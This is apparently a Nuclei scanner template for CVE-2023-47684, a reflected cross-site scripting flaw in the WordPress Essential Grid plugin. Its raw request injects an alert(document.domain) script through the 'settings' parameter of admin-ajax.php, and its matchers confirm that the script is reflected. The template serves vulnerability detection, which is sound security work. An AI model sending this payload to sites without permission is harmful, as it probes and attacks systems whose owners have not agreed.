52 lines
1.8 KiB
YAML
52 lines
1.8 KiB
YAML
id: CVE-2023-47684
|
||
|
||
info:
|
||
name: Essential Grid <= 3.1.0 - Cross-Site Scripting
|
||
author: 0xpugal
|
||
severity: medium
|
||
description: |
|
||
Unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability in ThemePunch OHG Essential Grid plugin <= 3.1.0 versions.
|
||
reference:
|
||
- https://patchstack.com/database/vulnerability/essential-grid/wordpress-essential-grid-plugin-3-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
|
||
- https://nvd.nist.gov/vuln/detail/CVE-2023-47684
|
||
classification:
|
||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||
cvss-score: 6.1
|
||
cve-id: CVE-2023-47684
|
||
cwe-id: CWE-79
|
||
epss-score: 0.00046
|
||
epss-percentile: 0.17675
|
||
cpe: cpe:2.3:a:themepunch:essential_grid:*:*:*:*:*:wordpress:*:*
|
||
metadata:
|
||
verified: true
|
||
max-request: 1
|
||
vendor: themepunch
|
||
product: essential_grid
|
||
framework: wordpress
|
||
publicwww-query: "essential-grid-plugin"
|
||
tags: cve,cve2023,wordpress,wp,xss,wp-theme,essential-grid,themepunch
|
||
|
||
http:
|
||
- raw:
|
||
- |
|
||
GET /wp-admin/admin-ajax.php?action=Essential_Grid_Front_request_ajax&client_action=load_post_content&postid=1&settings={%22lbMax%22:%22\%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%22} HTTP/2
|
||
Host: {{Hostname}}
|
||
|
||
matchers-condition: and
|
||
matchers:
|
||
- type: word
|
||
part: body
|
||
words:
|
||
- "<script>alert(document.domain);</script>"
|
||
- "lightbox"
|
||
condition: and
|
||
|
||
- type: word
|
||
part: content_type
|
||
words:
|
||
- text/html
|
||
|
||
- type: status
|
||
status:
|
||
- 200
|
||
# digest: 4b0a00483046022100f7cb5c991743f61bb0271c4df53a38294c3c766028460dbf81b7a800b9b1c820022100d034c80228fc2da5a33a71be285ea67b4a483c2f1d758cb7294cbc5ee9e061bb:922c64590222798bb761d5b6d8e72950 |